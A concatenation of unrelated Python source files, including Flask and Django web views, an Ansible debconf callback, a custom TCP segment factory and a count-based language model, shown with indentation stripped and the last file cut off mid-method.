if __name__ == "__main__":
main()
|
import unittest
import main
class FlaskTestCase(unittest.TestCase):
def setUp(self):
main.app.testing = True
client = main.app.test_client()
rv = client.post('/', data=dict(memo='テスト'))
self.html = rv.data.decode('utf-8').lower()
def test_result(self):
self.assertTrue('テスト' in self.html, msg='メモが正しく書き込まれていません')
|
import requests
import matplotlib.pyplot as plt
import json
import pandas
domain = "104.196.179.170/"
address = f'http://{domain}/api/traces'
operations = {
"Recv./": "recv_home_page",
"Recv./cart": "recv_cart",
"Recv./cart/checkout": "recv_cart_checkout",
"Recv./product/0PUK6V6EV0": "recv_product_0PUK6V6EV0",
"Recv./setCurrency": "recv_setCurrency",
"Recv./product/L9ECAV7KIM": "recv_product_L9ECAV7KIM",
}
def get_all(operation_name):
filename = operations[operation_name]
payload = {"limit": 1000, "lookback": "1h", "operation": operation_name, "service": "frontend"}
#import pdb;pdb.set_trace()
results = requests.get(address, params=payload).json()
with open(f'data/full_trace_{filename}.json', 'w', encoding='utf-8') as f:
json.dump(results, f, ensure_ascii=False, indent=4)
lengths = [[r["duration"] / 1000 for r in result["spans"] if len(r["references"]) == 0][0] for result in results["data"]] # in microseconds
series = pandas.Series(lengths)
print(filename)
print(series.describe())
series.to_csv(f"data/durations_recorded_by_jaegar_{filename}.csv")
for operation in operations:
get_all(operation) |
from __future__ import absolute_import, division, print_function
import os
import atexit
from ansible.plugins.callback import CallbackBase
RUNNING_TEMPLATE = "run-ansible/progress/info/running"
class CallbackModule(CallbackBase):
CALLBACK_VERSION = 2.0
CALLBACK_TYPE = 'shrug'
CALLBACK_NAME = 'debconf'
def __init__(self):
self._enabled = False
self._progress_started = False
# This is nasty:
atexit.register(self._stop_progress_if_started)
super(CallbackModule, self).__init__()
if os.environ.get("DEBIAN_FRONTEND") == "passthrough":
try:
readfd = int(os.environ["DEBCONF_READFD"])
self._debconf_in = os.fdopen(os.dup(readfd), 'r')
writefd = int(os.environ["DEBCONF_WRITEFD"])
self._debconf_out = os.fdopen(writefd, 'w')
except Exception as e:
self._display.vvvv("failed to fdopen debconf fd: {}".format(e))
else:
self._enabled = True
self._display.vvvv("opened debconf fds")
else:
self._display.vvvv(
"debconf callbacks disabled: DEBIAN_FRONTEND<>passthrough")
# Might confuse child processes
for env in ["DEBCONF_OLD_FD_BASE", "DEBCONF_REDIR", "DEBCONF_READFD",
"DEBCONF_WRITEFD", "DEBIAN_FRONTEND",
"DEBIAN_HAS_FRONTEND"]:
try:
del os.environ[env]
except:
pass
def _communicate(self, line):
if self._enabled:
self._display.vvvv("debconf_out: {}".format(line))
self._debconf_out.write(line + "\n")
self._debconf_out.flush()
reply = self._debconf_in.readline()
self._display.vvvv("debconf_in: {}".format(reply))
else:
self._display.vvvv("debconf disabled: {}".format(line))
def _subst(self, thing_type, thing):
thing_name = " ".join(thing.get_name().strip().split())
self._communicate("SUBST {} THINGTYPE {}".format(RUNNING_TEMPLATE, thing_type))
self._communicate("SUBST {} THINGNAME {}".format(RUNNING_TEMPLATE, thing_name))
def _start_progress(self, thing_type_for_title, thing_for_title, total):
self._progress_current = 0
self._progress_total = total
self._subst(thing_type_for_title, thing_for_title)
self._communicate("PROGRESS START 0 {} {}".format(total, RUNNING_TEMPLATE))
self._progress_started = True
def _set_progress_info(self, thing_type, thing):
self._subst(thing_type, thing)
self._communicate("PROGRESS INFO {}".format(RUNNING_TEMPLATE))
def _step_progress_bar(self):
if self._progress_current < self._progress_total:
self._progress_current += 1
self._communicate("PROGRESS SET {}".format(self._progress_current))
def _stop_progress_if_started(self):
if self._progress_started:
self._communicate("PROGRESS STOP")
self._progress_started = False
def v2_playbook_on_play_start(self, play):
# This is an approximation, because of conditional tasks; rescue/always, etc.
# It works well enough.
def count_tasks(things):
res = 0
for thing in things:
did_recurse = False
for recursion in ("block", "always"):
inner = getattr(thing, recursion, None)
if inner:
res += count_tasks(inner)
did_recurse = True
if not did_recurse:
res += 1
return res
self._stop_progress_if_started()
self._start_progress("play", play, count_tasks(play.compile()))
def v2_playbook_on_task_start(self, task, is_conditional):
self._set_progress_info("task", task)
self._step_progress_bar()
def v2_playbook_on_cleanup_task_start(self, task):
self._set_progress_info("cleanup-task", task)
def v2_playbook_on_handler_task_start(self, task):
self._set_progress_info("handler", task)
|
from rest_framework import status
from rest_framework.response import Response
from rest_framework.decorators import api_view, permission_classes
from rest_framework.authtoken.views import ObtainAuthToken
from rest_framework.authtoken.models import Token
from rest_framework.views import APIView
from accounts.api.serializers import RegistrationSerializer
@api_view(['POST',])
def registration_view(request):
if request.method == 'POST':
serializer = RegistrationSerializer(data=request.data)
data = {}
if serializer.is_valid():
account = serializer.save()
data['id'] = account.id
data['response'] = 'successfully registered a new user.'
data['email'] = account.email
data['username'] = account.username
data['status'] = 'success'
else:
errorKeys = list(serializer.errors.keys())
if 'email' in errorKeys:
data['message'] = serializer.errors['email'][0].capitalize()
elif 'username' in errorKeys:
data['message'] = serializer.errors['username'][0].capitalize()
elif 'password' in errorKeys:
data['message'] = serializer.errors['password'][0].capitalize()
data['status'] = 'failed'
return Response(data)
class loginView(ObtainAuthToken):
def post(self, request, *args, **kwargs):
serializer = self.serializer_class(data=request.data,context={'request': request})
serializer.is_valid(raise_exception=True)
user = serializer.validated_data['user']
token, created = Token.objects.get_or_create(user=user)
return Response({
'token': token.key,
'id': user.pk,
'username': user.username,
'email': user.email
})
class logoutView(APIView):
def post(self, request, format=None):
try:
authorization = request.META.get('HTTP_AUTHORIZATION')
token = authorization.split()[1]
user = Token.objects.get(key=token).user
# delete the token
user.auth_token.delete()
except:
pass
return Response({"message":"logged out successfully", "status":status.HTTP_200_OK})
# class AccountViewSet(viewsets.ModelViewSet):
# queryset = Account.objects.all()
# serializer_class = RegistrationSerializer
# def get_csrf(request):
# response = JsonResponse({"Info": "Success - Set CSRF cookie"})
# response["X-CSRFToken"] = get_token(request)
# return response
# @require_POST
# def loginView(request):
# data = json.loads(request.body)
# email = data.get("email")
# password = data.get("password")
# if email is None or password is None:
# return JsonResponse({"info": "Email and Password is needed"})
# user = authenticate(request, email=email, password=password)
# if user is None:
# return JsonResponse({"info": "User does not exist"}, status=400)
# login(request, user)
# return JsonResponse({"info": "User logged in successfully", "username": user.username})
# @login_required
# def logoutView(request):
# logout(request)
# return JsonResponse({"info": "User logged out successfully"})
# class WhoAmIView(APIView):
# authentication_classes = [SessionAuthentication]
# permission_classes = [IsAuthenticated]
# @staticmethod
# def get(request, format=None):
# if request.user.is_authenticated:
# return JsonResponse({"username": request.user.get_username()}) |
import c3srtconv
def write_single(line):
start_time = c3srtconv.time_to_srt_str(line.start_time)
end_time = c3srtconv.time_to_srt_str(line.end_time)
return "{} --> {}\n{}".format(start_time, end_time, line.text)
def write_multiple(lines):
srt = ''
num = 0
for line in lines:
num += 1
srt += str(num) + '\n' + write_single(line) + '\n\n'
return srt |
def has_tag(tag_id, content_item):
if not 'tags' in content_item:
return False
return tag_id in [tag['id'] for tag in content_item['tags']] |
# coding=utf-8
__author__ = 'leo.he'
import logging
logger = logging.getLogger()
logfile = 'app.log'
fh = logging.FileHandler(logfile)
fh.setLevel(logging.DEBUG)
ch = logging.StreamHandler()
ch.setLevel(logging.DEBUG)
formatter = logging.Formatter("%(asctime)s - %(filename)s[line:%(lineno)d] - %(levelname)s: %(message)s")
fh.setFormatter(formatter)
ch.setFormatter(formatter)
logger.addHandler(fh)
logger.addHandler(ch)
|
# Factory for bTCP segments
from btcp.segment_type import *
from btcp.constants import HEADER_SIZE, PAYLOAD_SIZE, SEGMENT_SIZE
from sys import byteorder
# Some indices
SEQUENCE_NUM = 0
ACK_NUM = 2
FLAGS = 4
WINDOW = 5
DATA_LENGTH = 6
CHECKSUM = 8
# Field sizes
SEQUENCE_SIZE = 2
ACK_SIZE = 2
FLAGS_SIZE = 1
WINDOW_SIZE = 1
DATA_LENGTH_SIZE = 2
CHECKSUM_SIZE = 2
class bTCPSegment:
def __init__(self):
# Empty fields
self.data = bytearray(0)
self.flags = []
self.flagint = 0
self.seqnumber = 0
self.acknumber = 0
self.window = 0
self.checksum = 0
self.datalength = 0
self.setchecksum = False
self.checksumfunction = None
self.factory = False
def setFlag(self, type):
if not self.factory:
pass
# Throw an error if we did not get the proper type
if not isinstance(type, SegmentType):
raise TypeError("Type must be of type SegmentType")
existing = self.header[FLAGS]
mask = 1 << type.value
new = (existing & ~mask) | mask
self.header[FLAGS] = new
self.flags.append(type)
return self
def setSequenceNumber(self, number):
if not self.factory:
pass
self.header[SEQUENCE_NUM:SEQUENCE_NUM + SEQUENCE_SIZE] = int.to_bytes(number, SEQUENCE_SIZE, byteorder)
self.seqnumber = number
return self
def setAcknowledgementNumber(self, number):
if not self.factory:
pass
self.acknumber = number
self.header[ACK_NUM:ACK_NUM + ACK_SIZE] = int.to_bytes(number, ACK_SIZE, byteorder)
return self
def setWindow(self, window):
if not self.factory:
pass
self.window = window
self.header[WINDOW] = window
return self
def setChecksum(self, checksum):
if not self.factory:
pass
self.checksumfunction = checksum
self.setchecksum = True
return self
def setPayload(self, payload):
if not self.factory:
pass
self.data = bytearray(payload)
datlen = len(self.data)
if datlen > PAYLOAD_SIZE:
raise AttributeError("Payload too large. Length was " + str(datlen) + ", but max length is " + str(PAYLOAD_SIZE))
self.datalength = datlen
self.header[DATA_LENGTH:DATA_LENGTH + DATA_LENGTH_SIZE] = int.to_bytes(datlen, DATA_LENGTH_SIZE, byteorder)
return self
def make(self):
if not self.factory:
pass
segment = self.header + self.data
if self.setchecksum:
self.checksum = self.checksumfunction(segment)
self.header[CHECKSUM:CHECKSUM + CHECKSUM_SIZE] = int.to_bytes(self.checksum, CHECKSUM_SIZE, byteorder)
segment = self.header + self.data
# Sanity check
if len(segment) > SEGMENT_SIZE:
raise AttributeError(
"Segment too large. Length was " + str(len(segment)) + ", but max lenght is " + SEGMENT_SIZE)
return segment
def Factory(self):
# Init empty array for header
self.data = bytearray(0)
self.header = bytearray(HEADER_SIZE)
self.factory = True
return self
def decode(self, rawSegment):
header = rawSegment[0:10]
seqnum = header[SEQUENCE_NUM:SEQUENCE_SIZE]
self.seqnumber = int.from_bytes(seqnum, byteorder)
acknum = header[ACK_NUM:ACK_NUM+ACK_SIZE]
self.acknumber = int.from_bytes(acknum, byteorder)
flags = header[FLAGS:FLAGS+FLAGS_SIZE]
self.flags, self.flagint = self.decodeFlags(flags)
window_ = header[WINDOW:WINDOW+WINDOW_SIZE]
self.window = int.from_bytes(window_, byteorder)
datlen = header[DATA_LENGTH:DATA_LENGTH+DATA_LENGTH_SIZE]
self.datalength = int.from_bytes(datlen, byteorder)
checksum = header[CHECKSUM:CHECKSUM+CHECKSUM_SIZE]
self.checksum = int.from_bytes(checksum, byteorder)
self.data = rawSegment[10:(10 + self.datalength)].decode()
def decodeFlags(self, flags):
number = int.from_bytes(flags, byteorder)
flags = []
if number & 2 != 0:
flags.append(SegmentType.ACK)
if number & 8 != 0:
flags.append(SegmentType.SYN)
if number & 32 != 0:
flags.append(SegmentType.FIN)
return flags, number
|
"""templer.django_project_app"""
import os
from templer.core.vars import StringVar
from templer.core.vars import BooleanVar
from templer.core.base import BaseTemplate
from templer.core.structures import Structure
HELP_TEXT = """
This creates a basic skeleton for a Django application within a project.
"""
POST_RUN_MESSAGE = """
Now you can install your application into your project by adding these lines.
in %(project_root_path)surls.py:
url(r'^%(egg)s/', include('%(project_root_module)s%(egg)s.urls')),
in %(project_root_path)ssettings.py:
INSTALLED_APPS = (
...
'%(project_root_module)s%(egg)s',
...)
"""
MODEL_VAR = StringVar(
'model',
title='Model name',
description='Default name of the model',
default='Model',
help='The name of the Model should be in singular form '
'and in CapitalizedWords format.'
)
MANAGEMENT_COMMAND_VAR = BooleanVar(
'add_management_command',
title='Add management command',
description='Should the application have management command ?',
default=False,
structures={'False': None, 'True': 'management_command'},
help='This will create the structure for adding management '
'commands to your application.'
)
class ManagementCommandStructure(Structure):
_structure_dir = 'structures/management_command'
class DjangoProjectApp(BaseTemplate):
_template_dir = 'templates/django_project_app'
summary = 'A basic Django project application skeleton within a project'
help = HELP_TEXT
category = 'Django'
use_cheetah = True
vars = [MODEL_VAR, MANAGEMENT_COMMAND_VAR]
def pre(self, command, output_dir, vars):
super(DjangoProjectApp, self).pre(
command, output_dir, vars)
vars['project_root'] = os.path.split(os.getcwd())[-1]
vars['project_root_path'] = '%s/' % vars['project_root']
vars['project_root_module'] = '%s.' % vars['project_root']
vars['model_lower'] = vars['model'].lower()
def post(self, command, output_dir, vars):
# Don't set the message to self.post_run_msg because the output
# is really ugly. Simply rename the next assignment to change
# this behavior.
self.post_run_message = POST_RUN_MESSAGE % vars
print self.post_run_message
super(DjangoProjectApp, self).post(
command, output_dir, vars)
class DjangoApp(DjangoProjectApp):
summary = 'A basic Django project application skeleton'
def pre(self, command, output_dir, vars):
super(DjangoApp, self).pre(
command, output_dir, vars)
vars['project_root'] = ''
vars['project_root_path'] = ''
vars['project_root_module'] = ''
|
from PIL import Image
import sys
im = Image.open(sys.argv[1])
print('Picture format: ' + im.format)
print('Picture Matrix size: ' + str(im.size))
print('Picture mode: ' + im.mode)
row = im.size[0]
column = im.size[1]
print('Picture row: ' + str(row))
print('Picture column: ' + str(column))
def print_color_value():
print('{')
for i in range(row):
for j in range(column):
rgb = im.getpixel((i,j))
color_data = (rgb[0]<<16) + (rgb[1]<<8) + rgb[2]
if j == 0:
print('\t{' + '0x%x'%color_data, end=', ')
elif j == (column-1):
print('0x%x'%color_data, end='},')
else:
print('0x%x'%color_data, end=', ')
print();
print('}')
def image_zoom():
print_color_value()
|
from django.shortcuts import render, redirect
from buddy_app.models import*
from django.contrib import messages
import bcrypt
def index(request):
return render(request, 'welcome.html')
def create_user(request):
if request.method == "POST":
errors = User.objects.registration_validator(request.POST)
if len(errors) > 0:
for key,value in errors.items():
messages.error(request, value)
return redirect('/')
hash_pw = bcrypt.hashpw(request.POST['password'].encode(), bcrypt.gensalt()).decode()
new_user = User.objects.create(
first_name = request.POST['first_name'],
last_name = request.POST['last_name'],
email = request.POST['email'],
password = hash_pw
)
request.session['logged_user'] = new_user.id
return redirect('/user/hello')
return redirect("/")
# localhost:8000/dashboard
def login(request):
if request.method == "POST":
user = User.objects.filter(email = request.POST['email'])
if user:
log_user = user[0]
if bcrypt.checkpw(request.POST['password'].encode(), log_user.password.encode()):
request.session['logged_user'] = log_user.id
return redirect('/user/hello')
messages.error(request, "Email or password are incorrect.")
return redirect("/")
def dashboard(request):
context = {
'logged_user': User.objects.get(id=request.session['logged_user']),
'all_trips': Trip.objects.all().order_by('-created_at')
}
return render(request, 'hello.html', context)
def create_trip(request):
if request.method == 'POST':
errors = Trip.objects.basic_validator(request.POST)
if len(errors) > 0:
for key, value in errors.items():
messages.error(request, value)
return redirect(f'/user/trip')
else:
user = User.objects.get(id=request.session['logged_user'])
new_trip = Trip.objects.create(
destination = request.POST['destination'],
start_date = request.POST['start_date'],
end_date = request.POST['end_date'],
plan = request.POST['plan'],
user_trip = user
)
return redirect(f'/user/hello')
def trip(request):
context = {
'logged_user' : User.objects.get(id=request.session['logged_user']),
'all_trips': Trip.objects.all()
}
return render(request, 'create_trip.html', context)
def edit_trip(request, trip_id):
trip = Trip.objects.get(id=trip_id)
context = {
'logged_user' : User.objects.get(id=request.session['logged_user']),
'trip': trip
}
return render(request, 'edit_trip.html', context)
def updated_trip(request, trip_id):
if request.method == 'POST':
errors = Trip.objects.basic_validator(request.POST)
if len(errors) > 0:
for key, value in errors.items():
messages.error(request, value)
return redirect(f'/trip/{trip_id}/edit')
else:
update_trip = Trip.objects.get(id=trip_id)
update_trip.destination = request.POST['destination']
update_trip.start_date = request.POST['start_date']
update_trip.end_date = request.POST['end_date']
update_trip.plan = request.POST['plan']
update_trip.save()
messages.success(request, "Trip successfully updated")
return redirect(f'/user/hello')
def view_trip(request, trip_id):
context = {
'logged_user' : User.objects.get(id=request.session['logged_user']),
'trip' : Trip.objects.get(id=trip_id),
}
return render(request, 'view_trip.html', context)
def delete_trip(request, trip_id):
if 'logged_user' not in request.session:
messages.error(reques, "Please register or log in first")
trip = Trip.objects.get(id=trip_id)
trip.delete()
return redirect(f'/user/hello')
def logout(request):
request.session.flush()
return redirect('/')
# Create your views here.
|
import sys
from .. import Container, DataAttribute, Attribute, Attributes
from ..exc import Concern
class BaseTransform(Container):
"""The core implementation of common Transform shared routines.
Most transformer implementations should subclass Transform or SplitTransform.
"""
def foreign(self, value, context=None):
"""Convert a value from Python to a foriegn-acceptable type, i.e. web-safe, JSON-safe, etc."""
return value
def native(self, value, context=None):
"""Convert a value from a foreign type (i.e. web-safe) to Python-native."""
return value
def loads(self, value, context=None):
"""Attempt to load a string-based value into the native representation.
Empty strings are treated as ``None`` values.
"""
if value == '' or (hasattr(value, 'strip') and value.strip() == ''):
return None
return self.native(value)
def dumps(self, value, context=None):
"""Attempt to transform a native value into a string-based representation.
``None`` values are represented as an empty string.
"""
if value is None:
return ''
return str(self.foreign(value))
def load(self, fh, context=None):
"""Attempt to transform a string-based value read from a file-like object into the native representation."""
return self.loads(fh.read())
def dump(self, fh, value, context=None):
"""Attempt to transform and write a string-based foreign value to the given file-like object.
Returns the length written.
"""
value = self.dumps(value)
fh.write(value)
return len(value)
class Transform(BaseTransform):
"""The base transformer implementation.
Like validation, may raise Concern on invalid input data. The role of a transformer, though, is to expend
Best Effort to transform values to and from a foreign format. This base class defines two attributes:
* ``encoding`` The encoding to use during any encoding/decoding that is required. (Default: ``utf-8``)
* ``strip`` Should string values be stripped of leading and trailing whitespace? (Default: ``True``)
Transformers should operate bi-directionally wherever possible.
"""
none = Attribute(default=False) # Handle processing of empty string values into None values.
encoding = Attribute(default='utf-8') # Specify None to disable str-to-unicode conversion.
strip = Attribute(default=True) # Specify False to disable automatic text stripping.
def native(self, value, context=None):
"""Convert a value from a foriegn type (i.e. web-safe) to Python-native."""
if self.strip and hasattr(value, 'strip'):
value = value.strip()
if self.none and value == '':
return None
if self.encoding and isinstance(value, bytes):
return value.decode(self.encoding)
return value
class IngressTransform(Transform):
"""The simplest transformation, typecasting incoming data.
Will attempt to use the ``ingress`` function to transform foreign values to native. It is assumed that native
values are acceptable as foreign values when using this transformer. ``None`` is an acceptable value in all cases.
(Combine this transformer with the Required validator if ``None`` values are not actually acceptable.)
For example::
integer = IngressTransform(ingress=int)
Useful in conjunction with SplitTransform to produce simple custom (de)serializers.
"""
ingress = DataAttribute()
def native(self, value, context=None):
"""Convert a value from a foriegn type (i.e. web-safe) to Python-native."""
value = super().native(value, context)
if value is None: return
try:
return self.ingress(value)
except Exception as e:
raise Concern("Unable to transform incoming value: {0}", str(e))
class EgressTransform(Transform):
"""As per IngressTransform, but for outgoing data."""
egress = DataAttribute()
def foreign(self, value, context=None):
value = super().foreign(value, context)
try:
return self.egress(value)
except Exception as e:
raise Concern("Unable to transform outgoing value: {0}", str(e))
class CallbackTransform(IngressTransform, EgressTransform):
"""A convienent combination of IngressTransform and EgressTransform.
Both ``ingress`` and ``egress`` callbacks _must_ be supplied to function.
"""
pass
class SplitTransform(BaseTransform):
"""Splits read and write behaviours between two transformers.
Both ``reader`` and ``writer`` transformer instances are required to function.
"""
reader = DataAttribute()
writer = DataAttribute()
def __init__(self, *args, **kw):
super().__init__(*args, **kw)
try:
self.reader
self.writer
except AttributeError:
raise Concern("SplitTransform instances must define both reader and writer child transformers.")
# Reader Methods
def native(self, value, context=None):
return self.reader.native(value, context)
def loads(self, value, context=None):
return self.reader.loads(value, context)
def load(self, fh, context=None):
return self.reader.load(fh, context)
# Writer Methods
def foreign(self, value, context=None):
return self.writer.foreign(value, context)
def dumps(self, value, context=None):
return self.writer.dumps(value, context)
def dump(self, fh, value, context=None):
return self.writer.dump(fh, value, context)
|
import pickle
from utilities import *
import numpy as np
import math
import pickle
from wordTypeCheckFunction import *
from collections import defaultdict
import pprint
def sigmoid(x):
return 1 / (1 + math.exp(-x))
"""
These models are count based probabilistic model
created using the DCS_Pick corpus
-----------------------------------
Uses KN smoothing
"""
class ProbModels():
def __init__(self, **kwargs):
kwargs = defaultdict(lambda: None, kwargs)
"""WORD2WORD CO-OCCURENCE DATA"""
fullCo_oc_mat = kwargs['fullCo_oc_mat']
unigram_counts = kwargs['unigram_counts']
context_count = defaultdict(int)
for word in fullCo_oc_mat.keys():
context_count[word] = len(fullCo_oc_mat[word])
# Each bigram is repeated; a-b is same as b-a
total_context = int(sum(context_count.values()))
total_co_oc = sum(
[sum(fullCo_oc_mat[word].values()) for word in fullCo_oc_mat.keys()])
co_oc_count = defaultdict(int)
for w in fullCo_oc_mat.keys():
co_oc_count[w] = sum(fullCo_oc_mat[w].values())
self.fullCo_oc_mat = fullCo_oc_mat
self.unigram_counts = unigram_counts
self.context_count = context_count
self.total_context = total_context
self.total_co_oc = total_co_oc
self.co_oc_count = co_oc_count
"""TYPE2TYPE DATA"""
cng2cngFullMat = kwargs['cng2cngFullMat']
cng2index_dict = kwargs['cng2index_dict']
t2t_context_count = np.sum(cng2cngFullMat > 0, axis = 1) # Row-wise sum
t2t_total_co_oc = int(np.sum(cng2cngFullMat))
t2t_total_contexts = np.sum(t2t_context_count)
t2t_co_oc_count = np.sum(cng2cngFullMat, axis = 1) # Row-wise sum
self.cng2cngFullMat = cng2cngFullMat
self.cng2index_dict = cng2index_dict
self.t2t_context_count = t2t_context_count
self.t2t_total_contexts = t2t_total_contexts
self.t2t_total_co_oc = t2t_total_co_oc
self.t2t_co_oc_count = t2t_co_oc_count
"""VERB2TYPE DATA"""
self.v2c_fullMat = kwargs['v2c_fullMat']
self.verbsList = defaultdict(int)
for v in self.v2c_fullMat.keys():
self.verbsList[v] = 1
"""W2W_SAME_CNG DATA"""
w2w_samecng_fullmat = kwargs['w2w_samecng_fullmat']
samecng_unigram_counts = kwargs['samecng_unigram_counts']
samecng_context_count = defaultdict(int)
for word in w2w_samecng_fullmat.keys():
samecng_context_count[word] = len(w2w_samecng_fullmat[word])
# Each bigram is repeated; a-b is same as b-a
samecng_total_context = int(sum(samecng_context_count.values())/2)
samecng_total_co_oc = sum(
[sum(w2w_samecng_fullmat[word].values()) for word in w2w_samecng_fullmat.keys()])
samecng_co_oc_count = defaultdict(int)
for w in w2w_samecng_fullmat.keys():
samecng_co_oc_count[w] = sum(w2w_samecng_fullmat[w].values())
self.w2w_samecng_fullmat = w2w_samecng_fullmat
self.samecng_unigram_counts = samecng_unigram_counts
self.samecng_context_count = samecng_context_count
self.samecng_total_context = samecng_total_context
self.samecng_total_co_oc = samecng_total_co_oc
self.samecng_co_oc_count = samecng_co_oc_count
return
def RemoveCompetingEdges(self, TransitionMat, tuplesMain, chunkDict):
lastTuple = tuplesMain[len(tuplesMain) - 1]
nodeCount = lastTuple[len(lastTuple) - 1][0] + 1
wordList = ['']*nodeCount
for i in range(0, len(tuplesMain)):
# print(tuplesMain[i])
for tup in tuplesMain[i]:
wordList[tup[0]] = tup[1]
# REMOVE EDGES FROM COMPETETING NODES
# IN THE SAME CHUNK
cDict2 = {}
for cid in chunkDict.keys():
chunk = chunkDict[cid]
cDict2[cid] = {}
for pos in chunk.keys():
wids = []
for zz in chunk[pos]:
for tup in tuplesMain[zz]:
wids.append(tup[0])
cDict2[cid][pos]=wids
for cid in chunkDict.keys():
chunk = chunkDict[cid]
for pos in chunk.keys():
wids = chunk[pos]
# Remove edge b/w nodes at same location
for u in range(len(wids) - 1):
for v in range(u + 1, len(wids)):
# print('Remvoe b/w', wordList[wids[u]], wordList[wids[v]])
TransitionMat[wids[u], wids[v]] = 0
TransitionMat[wids[v], wids[u]] = 0
# Remove edge b/w competing nodes from diff location
for _pos in chunk.keys():
wids2 = chunk[_pos]
if(pos < _pos):
for wi1 in wids:
for wi2 in wids2:
name1 = wordList[wi1]
name2 = wordList[wi2]
# '''
# # FIXME:
# '''
# try:
if not CanCoExist_sandhi(pos, _pos, name1, name2):
# print('Remvoe b/w', name1, name2)
TransitionMat[wi1, wi2] = 0
# except IndexError:
# pass
elif(_pos < pos):
for wi1 in wids:
for wi2 in wids2:
name1 = wordList[wi1]
name2 = wordList[wi2]
# try:
if not CanCoExist_sandhi(_pos, pos, name2, name1):
# print('Remvoe b/w', name2, name1)
TransitionMat[wi1, wi2] = 0
# except IndexError:
# pass
def get_cng2cng_mat(self, tuplesMain, chunkDict, kn_smooth = True):
# pprint.pprint(tuplesMain)
# pprint.pprint(chunkDict)
lastTuple = tuplesMain[len(tuplesMain) - 1]
nodeCount = lastTuple[len(lastTuple) - 1][0] + 1
TransitionMat = np.zeros((nodeCount, nodeCount))
if kn_smooth:
for i in range(0, len(tuplesMain) - 1):
for j in range(i + 1, len(tuplesMain)):
tSet1 = tuplesMain[i]
tSet2 = tuplesMain[j]
for tup1 in tSet1:
for tup2 in tSet2:
row = tup1[0]
col = tup2[0]
# row != col, always
TransitionMat[row][col] = self.kn_cng2cng(tup1[3], tup2[3])
TransitionMat[col][row] = self.kn_cng2cng(tup2[3], tup1[3])
self.RemoveCompetingEdges(TransitionMat, tuplesMain, chunkDict)
for row in range(nodeCount):
row_sum = np.sum(TransitionMat[row, :])
if(row_sum == 0):
print("Report ROW SUM ZERO CNG2CNG")
else:
TransitionMat[row, :] /= row_sum
TransitionMat[row, row] = 0
else:
# FIXME: DOESN'T SUPPORT TUPLESMAIN
cng2cngFullMat = self.cng2cngFullMat
cng2index_dict = self.cng2index_dict
cngList = []
for tupleSet in tuplesMain:
for tup in tupleSet:
cngList.append(tup[3])
cngIndexList = []
for cng in cngList:
try:
ci = cng2index_dict[str(cng)]
cngIndexList.append(ci)
except:
cngIndexList.append(None)
for row in range(nodeCount):
for col in range(nodeCount):
if row != col:
try:
# print(cngIndexList[row])
TransitionMat[row][col] = cng2cngFullMat[cngIndexList[row],cngIndexList[col]]
except KeyError:
TransitionMat[row][col] = 0 #WHAT TO DO HERE??
else:
TransitionMat[row][col] = 0
row_sum = np.sum(TransitionMat[row, :])
if(row_sum > 0):
TransitionMat[row, :] /= row_sum
else:
TransitionMat[row, :] = 1/(nodeCount - 1)
pass
TransitionMat[row, row] = 0
# print((TransitionMat[row, :]))
# MakeRowStochastic(TransitionMat)
return TransitionMat
def get_w2w_mat(self, tuplesMain, chunkDict, kn_smooth = True):
lastTuple = tuplesMain[len(tuplesMain) - 1]
nodeCount = lastTuple[len(lastTuple) - 1][0] + 1
TransitionMat = np.zeros((nodeCount, nodeCount))
if kn_smooth:
for i in range(0, len(tuplesMain) - 1):
for j in range(i + 1, len(tuplesMain)):
tSet1 = tuplesMain[i]
tSet2 = tuplesMain[j]
for tup1 in tSet1:
for tup2 in tSet2:
row = tup1[0]
col = tup2[0]
# row != col, always
TransitionMat[row][col] = self.kn_word2word(tup1[2], tup2[2])
TransitionMat[col][row] = self.kn_word2word(tup2[2], tup1[2])
self.RemoveCompetingEdges(TransitionMat, tuplesMain, chunkDict)
for row in range(nodeCount):
row_sum = np.sum(TransitionMat[row, :])
if(row_sum == 0):
print("Report ROW SUM ZERO W2W", row)
else:
TransitionMat[row, :] /= row_sum
TransitionMat[row, row] = 0
else:
# FIXME:
wordList = []
for tupleSet in tuplesMain:
for tup in tupleSet:
wordList.append(tup[2])
for row in range(nodeCount):
for col in range(nodeCount):
if row != col:
try:
TransitionMat[row][col] = self.fullCo_oc_mat[wordList[row]][wordList[col]]
except KeyError:
TransitionMat[row][col] = 0
else:
TransitionMat[row][col] = 0
row_sum = np.sum(TransitionMat[row, :])
if row_sum > 0:
TransitionMat[row, :] /= row_sum
else:
TransitionMat[row, :] = 1/(nodeCount - 1)
TransitionMat[row, row] = 0
# print((TransitionMat[row, :]))
# MakeRowStochastic(TransitionMat)
return TransitionMat
def get_w2w_samecng_mat(self, tuplesMain, chunkDict, kn_smooth = True):
lastTuple = tuplesMain[len(tuplesMain) - 1]
nodeCount = lastTuple[len(lastTuple) - 1][0] + 1
TransitionMat = np.zeros((nodeCount, nodeCount))
if kn_smooth:
for i in range(0, len(tuplesMain) - 1):
for j in range(i + 1, len(tuplesMain)):
tSet1 = tuplesMain[i]
tSet2 = tuplesMain[j]
for tup1 in tSet1:
for tup2 in tSet2:
row = tup1[0]
col = tup2[0]
# row != col, always
TransitionMat[row][col] = self.kn_word2word_samecng(tup1[2], tup2[2])
TransitionMat[col][row] = self.kn_word2word_samecng(tup2[2], tup1[2])
self.RemoveCompetingEdges(TransitionMat, tuplesMain, chunkDict)
for row in range(nodeCount):
row_sum = np.sum(TransitionMat[row, :])
if(row_sum == 0):
print("Report ROW SUM ZERO SCNG")
TransitionMat[row, :] /= row_sum
TransitionMat[row, row] = 0
else:
wordList = []
for tupleSet in tuplesMain:
for tup in tupleSet:
wordList.append(tup[2])
for row in range(nodeCount):
for col in range(nodeCount):
if row != col:
try:
TransitionMat[row][col] = self.w2w_samecng_fullmat[wordList[row]][wordList[col]]
except KeyError:
TransitionMat[row][col] = 0
else:
TransitionMat[row][col] = 0
row_sum = np.sum(TransitionMat[row, :])
if row_sum != 0:
TransitionMat[row, :] /= row_sum
else:
TransitionMat[row, :] /= 1/(nodeCount - 1)
TransitionMat[row, row] = 0
return TransitionMat
def get_v2c_ranking(self, wordList, cngList, verbs):
# Higher is better
v2c_fullMat = self.v2c_fullMat
ranks = np.zeros(len(cngList))
for vi in verbs:
tempRank = np.zeros(len(cngList))
v = wordList[vi]
# print(v)
for i in range(len(cngList)):
if i not in verbs:
c = str(cngList[i])
if c in v2c_fullMat[v]:
tempRank[i] = v2c_fullMat[v][c]
else:
tempRank[i] = 0
ranks = np.max((tempRank, ranks), axis = 0)
# print(ranks)
s = np.sum(ranks)
if(s > 0):
ranks /= s
return ranks
def kn_word2word(self, word_a, word_b):
# P_kn(word_b | word_a)
